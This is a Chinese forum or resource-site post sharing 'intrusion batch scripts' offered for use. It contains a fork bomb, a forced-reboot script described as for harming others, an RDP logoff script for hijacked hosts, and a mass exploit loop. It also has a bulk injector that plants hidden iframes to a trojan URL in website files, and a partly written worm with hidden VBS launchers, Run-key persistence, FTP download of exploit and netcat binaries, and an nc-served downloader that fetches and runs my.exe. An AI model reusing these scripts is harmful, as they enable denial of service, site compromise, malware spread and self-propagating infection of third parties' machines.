也想出现在这里? 联系我们

各种入侵批处理

作者 : 小编 本文共4564个字,预计阅读时间需要12分钟 发布时间: 2021-06-2 共2.83K人阅读
也想出现在这里? 联系我们

第一个:让别人内存OVER(逼他重启)
@echo off
start cmd
%0

就这3行了

第二个:让对方重启指定次数(害人专用)
@echo off
if not exist c:\\1.txt echo. >c:\\1.txt & goto err1
if not exist c:\\2.txt echo. >c:\\2.txt & goto err1
if not exist c:\\3.txt echo. >c:\\3.txt & goto err1
if not exist c:\\4.txt echo. >c:\\4.txt & goto err1
if not exist c:\\5.txt echo. >c:\\5.txt & goto err1
goto err2
:err1
shutdown -s -t 0
:err2
上面可以让对方电脑重启5次后不在重启

第三个:自动踢人(3389肉机保护自己专用)
@echo off
logoff 1
del log.bat
logoff后面的1改成自己登陆的ID号,用query user查看

第四个: 批量自动溢出
@for /f %%i in (result.txt) do 42 %%i 58.44.89.158 521
先自己用NC监听端口,多开几个,然后指行,就自动溢出了

第五个:自动挂马改主页
@echo off
cls
rem 直接打批处理名字就有帮助
title 批量挂马,改首页(伤脑筋 QQ:447228437).
color A
set pan=%1
set ye=%2
set dai=%3
if "%pan%"=="" goto e1
if "%ye%"=="" goto e1
if "趇%"=="" goto e1
if "趇%"=="htm.txt" goto u1
forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE echo ^<iframe src="http://趇%" width="0" height="0" frameborder="0"^> >>@path"
echo.
echo 代码全部插入完毕!!!!
echo.
pause
goto e1
:u1
echo 您现在的操作将使%pan%盘下,全部名为%ye%的内容变为您要更改的内容.
echo 这将是非常危险的,您真的要这样做? 回车却认,Ctrl c取消操作.
pause
forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE copy %1\\htm.txt @path /y"
echo.
echo 首页全部更改完必!!!!如果您发现没有替换成功,请将%ye%文件只读属性去掉.
echo.
pause
:e1
echo.
echo 本批处理只适用于2003系统,其他系统要使用,请将forfiles.exe拷贝至系统盘system32目录下
echo 用法:snj ^<搜索盘符^> ^<文件名^> ^<网马地址^>
echo 例子:snj d:\\ index.asp www.muma.com/mm.htm
echo 批处理将自动添加^<iframe^>标记
echo.
echo 如果您要更改全部网站的首页!请在批处理文件所在目录下,新建一个名为htm.txt的文本文件.
echo 然后将要更改的代码加COPY到里面保存.然后将命令的^<网马地址^>项输入为htm.txt即可.
echo 例子:snj d:\\ index.asp htm.txt
echo.
echo 为了能准确无误执行批处理请最好先把记事本的"自动换行功能去掉",让命令保持在一行才能正确执行.
echo.
echo 使用此批处理造成一切后果本人概不负责,请大家谨慎使用!
echo.

第六个:利用批处理编写利用系统漏洞传播的蠕虫病毒
本来想写完后在做教程,要去学校了,所以先把思路告诉大家,大家可以先自己写写,我有时间写完发到群里.
这些是我未完成的批处理,大家可以在此基础上按照我下面说的思路继续写完
del c:\\42.exe
del c:\\nc.exe
del c:\\ip.exe
echo dim wsh > %systemroot%\\help\\test.vbs
echo set wsh=CreateObject("WScript.Shell") >> %systemroot%\\help\\test.vbs
echo wsh.run "cmd /c %systemroot%\\help\\nc -v -l -p 810 < %systemroot%\\help\\or.txt",0 >> %systemroot%\\help\\test.vbs
echo dim wsh > %systemroot%\\help\\test2.vbs
echo set wsh=CreateObject("WScript.Shell") >> %systemroot%\\help\\test2.vbs
echo wsh.run "cmd /c start %systemroot%\\help\\good.bat",0 >> %systemroot%\\help\\test2.vbs
echo open 10.0.0.5 > %systemroot%\\help\\ftp.txt
echo open myyes >> %systemroot%\\help\\ftp.txt
echo 1 >> %systemroot%\\help\\ftp.txt
echo binary >> %systemroot%\\help\\ftp.txt
echo get 42.exe c:\\42.exe >> %systemroot%\\help\\ftp.txt
echo get nc.exe c:\\nc.exe >> %systemroot%\\help\\ftp.txt
echo get ip.exe c:\\ip.exe >> %systemroot%\\help\\ftp.txt
echo bye >> %systemroot%\\help\\ftp.txt
echo echo Set xPost = CreateObject("Microsoft.XMLHTTP") ^>1.vbs > %systemroot%\\help\\or.txt
echo echo xPost.Open "GET","http://10.0.0.5/my.exe&quo…,0 ^>^>1.vbs >> %systemroot%\\help\\or.txt
echo echo xPost.Send() ^>^>1.vbs >> %systemroot%\\help\\or.txt
echo echo Set sGet = CreateObject("ADODB.Stream") ^>^>1.vbs >> %systemroot%\\help\\or.txt
echo echo sGet.Mode = 3 ^>^>1.vbs >> %systemroot%\\help\\or.txt
echo echo sGet.Type = 1 ^>^>1.vbs >> %systemroot%\\help\\or.txt
echo echo sGet.Write(xPost.responseBody) ^>^>1.vbs >> %systemroot%\\help\\or.txt
echo echo sGet.SaveToFile "d:\\my.exe",2 ^>^>1.vbs >> %systemroot%\\help\\or.txt
echo echo 1.vbs ^>^>1.vbs >> %systemroot%\\help\\or.txt
echo echo my.exe ^>^>1.vbs >> %systemroot%\\help\\or.txt
echo Windows Registry Editor Version 5.00 > %systemroot%\\help\\1.reg
echo [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run] >> %systemroot%\\help\\1.reg
echo "SKYNET Personal FireWall"="F:\\\\系统安全工具\\\\FireWall\\\\PFW.exe" >> %systemroot%\\help\\1.reg
echo "1"="%systemroot%\\\\help\\\\test2.vbs" >> %systemroot%\\help\\1.reg

if not exist %systemroot%\\help\\good.bat copy good.bat %systemroot%\\help\\good.bat & %systemroot%\\help\\test2.vbs & del good.bat
regedit -s %systemroot%\\help\\1.reg
ftp -s:%systemroot%\\help\\ftp.txt
move c:\\nc.exe %systemroot%\\help\\ /y
move c:\\42.exe %systemroot%\\help\\ /y
move c:\\ip.exe %systemroot%\\help\\ /y
%systemroot%\\help\\test.vbs
rem for /f %%i in (result1.txt) do set a=%%i
rem for /f %%j in (result.txt) do 42 %a% %%j 810
准备:
1:找一个反向连接的溢出攻击程序,如ms06040漏洞
2:找呀一个免费FTP空间,最好是送域名的
3:利用你所知道的高级语言编写一个,能生成随机范围IP地址和找到本机IP的工具.
思路:
用for语句对指定文本里的IP进行溢出,然后用if语句判断是否溢出成功, 如果成功开启一个NC监听端口,NC后面带一个 < 输入符号
输入的内容为下载本批处理文件,然后执行这个批处理.这样被溢出的机器就又会在他那里运行我门的批处理,从而到自动传播的目的.

把批处理生成的文件集中放到一个目录下,可以%systemroot%系统变量直接放到系统目录下
因为批处理运行后会闪出命令行窗口,我门可以利用VBS脚本来运行我们的批处理,这样就不会有任何窗口出现,脚本如下
echo dim wsh > %systemroot%\\help\\test.vbs
echo set wsh=CreateObject("WScript.Shell") >> %systemroot%\\help\\test.vbs
echo wsh.run "cmd /c %systemroot%\\help\\nc -v -l -p 810 < %systemroot%\\help\\or.txt",0 >> %systemroot%\\help\\test.vbs

生成随机IP工具的VB代码
Private Sub Form_Load()
Dim fso As New FileSystemObject
Dim a, b, c, d As Integer
Dim ph, e As String
ph = App.Path & "\\" & "ip.txt"
Randomize
a = Int(253 * Rnd 1)
b = Int(253 * Rnd 1)
c = Int(240 * Rnd 1)
Open ph For Output As #1
For i = c To c 7
For j = 1 To 254
e = a & "." & b & "." & i & "." & j
Print #1, e
DoEvents
Next j
Next i
Close #1
Unload Me
End Sub

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 各种入侵批处理

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录